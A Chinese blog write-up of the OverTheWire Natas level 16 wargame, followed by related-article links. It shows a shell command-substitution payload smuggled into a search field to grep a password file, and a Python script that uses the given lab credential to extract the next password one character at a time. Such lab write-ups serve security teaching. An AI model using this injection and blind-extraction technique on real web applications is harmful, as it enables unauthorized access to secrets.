natas16 题解

最新推荐文章于 2023-05-20 11:21:52 发布
最新推荐文章于 2023-05-20 11:21:52 发布
阅读量1k 收藏
点赞数
分类专栏: web安全 文章标签: python 正则表达式 sql盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyover/article/details/50059593
版权

本题与上一题相似(可看我上篇文章nata15 题解)

进入后发现和早前某关像,执行一个grep命令查找,这里的过滤字符中恰恰没包括 $ . * 这三个,可以利用$(grep -E ^8.* /etc/natas_webpasswd/natas17)hello 这样去输入

如果返回了hello和其他的字串,说明这里的grep没有执行,-E 是执行一个正则表达式,^8,* 这个表达式的意思是以8开头(这里就是上题的思路了),每次试出一个后附加上去然后继续试下一个,下一个加在原来的末尾,下面用python3实现,requests库比较好用,容易理解

import requests
url = "http://natas16.natas.labs.overthewire.org/"
username = "natas16"
password= 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
au = requests.auth.HTTPBasicAuth(username,password)
ans=""
testCharacter="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
i=0
while i < len(testCharacter):
#print(url1+key+url2)
    payload={'needle':'$(grep -E ^'+ans+testCharacter[i]+'.* /etc/natas_webpass/natas17)hello','submit':'Search'}
    req = requests.get(url,auth=au,params=payload)
    if 'hello' not in req.text:
        ans+=testCharacter[i]
        print(ans)
        i=0
        continue
    i+=1

lyover
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OverTheWire-Natas
LJFYYJ的博客
07-23 873
natas前17关,待更新~
WarGames-Natas(16)
whklhhhh的博客
08-18 517
natas(16)<? $key = "";if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; }if($key != "") { if(preg_match('/[;|&`\'"]/',$key)) { print "Input contains an illegal cha
Natas Wargame Level 16 Writeup(Content-based Blind SQL Injection)
a_18067的博客
05-15 136
sourcecode核心代码: 1 <?php 2 $key = ""; 3 4 if(array_key_exists("needle", $_REQUEST)) { 5 $key = $_REQUEST["needle"]; 6 } 7 8 if($key != "") { 9 if(preg_match('/...
网络空间安全——Wargame靶场(Natas)
最新发布
weixin_44717952的博客
05-20 1222
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
wargame-Natas(1-20)
weixin_43220691的博客
11-30 2439
wargame-natas write up
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
Natas: OverTheWire 战争游戏及Natas解决方案详解》 在网络安全学习和实践领域,OverTheWire是一个颇受欢迎的在线平台,它提供了一系列的战争游戏,旨在帮助用户提升对网络安全技术的理解和应用能力。其中,...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
natas
02-23
标题 "natas" 提供的信息表明这是一个与网络通信和数据包监听有关的程序,可能用于网络安全分析或教学目的。在Windows 2000操作系统环境下,它利用原始套接字(raw socket)来捕获和解析IP数据包。在IT领域,原始套...
Natas 幽灵王病毒的分析》
03-26
Natas 幽灵王病毒的分析》 很厉害的一个病毒分析案例
OverTheWire的natas游戏(13-20)
qq_40710190的博客
07-08 278
natas solution(13-20) Natas Level 12 → Level 13 Username: natas13 URL: http://natas13.natas.labs.overthewire.org 这一关和上一关非常相似,不同的在于 <?php if(array_key_exists("filename", $_POST)) { $target_path = makeRandomPathFromFilename("upload", $_POST["fil
Wargames靶场之natas(web安全)
weixin_50764099的博客
04-24 843
Natas系列包含服务器端Web安全的基础知识。每个级别的 natas 都由位于处的自己的网站组成,其中 X 是级别 数。。要访问某个级别,请输入用户名 对于该级别(例如,NATAS0 表示级别 0)及其密码。每个级别都可以访问下一级的密码。你的任务是以某种方式获取下一个密码并升级。。例如,存储 natas5 的密码 在文件 /etc/natas_webpass/natas5 中,只有 natas4 和 纳塔斯5。
natas(11-20)
半夜好饿的博客
08-18 998
natas11: 同样查看源码,审计。想要得到密码,需要使showpassword设置为yes,loadData函数是将cookie的值解密还原,存储与mydata数组中,并返回mydata。而savaData函数则是将传入的参数进行编码处理,存在COOKIE[“data”]中。 由此大体思路为,构造新的输入参数,是的showpassword值设置为yes,编码后得到新的data值。但完成这步,需...
web向wargame:natas通关手记
陈文青
08-16 7574
与之前做过的跟ssh和终端打交道的题目不同,nat
170819 WarGames-Natas(17-20)
whklhhhh的博客
08-19 548
1625-5 王子昂 总结《2017年8月19日》 【连续第321天总结】 A. Natas B. Level 17本关的源代码与level15相同,只是把echo语句注释掉了 那么很容易想到,返回值全部被隐藏的时候,使用sql时间盲注 即虽然页面没有显示,但是可以通过sleep()函数的执行与否来反馈 具体构造爆username的shellcode为:SELECT * from u
python字符串与字符串抑或解析(natas11 python解法)
飞鸟的博客
03-01 409
问题描述 我在做natas11的时候发现了一个问题,问题的需求可以简化为: $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[&quot;data&quot;])), true); 其中xor_decode的实现为: function xor_encrypt($in) { $key = '&amp;lt;censored&amp;gt;'; $te...
Pandas 基础(16) - Holidays
weixin_33701251的博客
03-07 193
这节依然是关于时间方面的知识.上一节学习了如何获取日期序列的函数, 以及通过一些基本的参数设置可以使时间序列跳过休息日等.这一节, 将要深入学习这个点, 做更自定义的设计. 通过上一节的学习, 我们知道了如何获取一个时间段的序列, 那我们很容易就可以得到 2019年2月1日到2月28日的所有工作日的时间序列: import pandas as pd pd.date_range(start=...
干货 | 目标检测入门,看这篇就够了(下)
热门推荐
AI科技大本营
03-17 1万+
作者 | 李家丞( 同济大学数学系本科在读,现格灵深瞳算法部实习生)近年来,深度学习模型逐渐取代传统机器视觉方法而成为目标检测领域的主流算法,本系列文章将回顾早期的经典工作,并对较新的趋势做一个全景式的介绍,帮助读者对这一领域建立基本的认识。(营长注:因本文篇幅较长,营长将其分为上(点击查看)、下两部分。)导言:目标检测的任务表述如何从图像中解析出可供计算机理解的信息,是机器视觉的中心问题。深度学
web测试基本点
yangjianli868的专栏
07-02 236
1、界面测试通用测试点 测试内容 测试点 页面显示 1、浏览器窗口标准或最大时页面元素显示是否正确,是否美观,窗口大小变化时页面刷新是否正确;2、电脑显示屏是宽屏或标屏下页面元素显示是否正确,是否美观;3、用户常用的几种分辨率下页面元素显示是否正确,是否美观。4、字体的大小要与界面的大小比例协调, 通常使用的字体中宋体9-12较为美观,很少使用超过12号的字体。5...
OverTheWire的Natas题
公众号shadow sock7
11-06 1323
题目: http://overthewire.org/wargames/natas/ Write-up: http://perso.heavyberry.com/articles/2014-01/natas禁用上下文按钮(右键)<body oncontextmenu="javascript:alert('right clicking has been blocked!');return fal
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值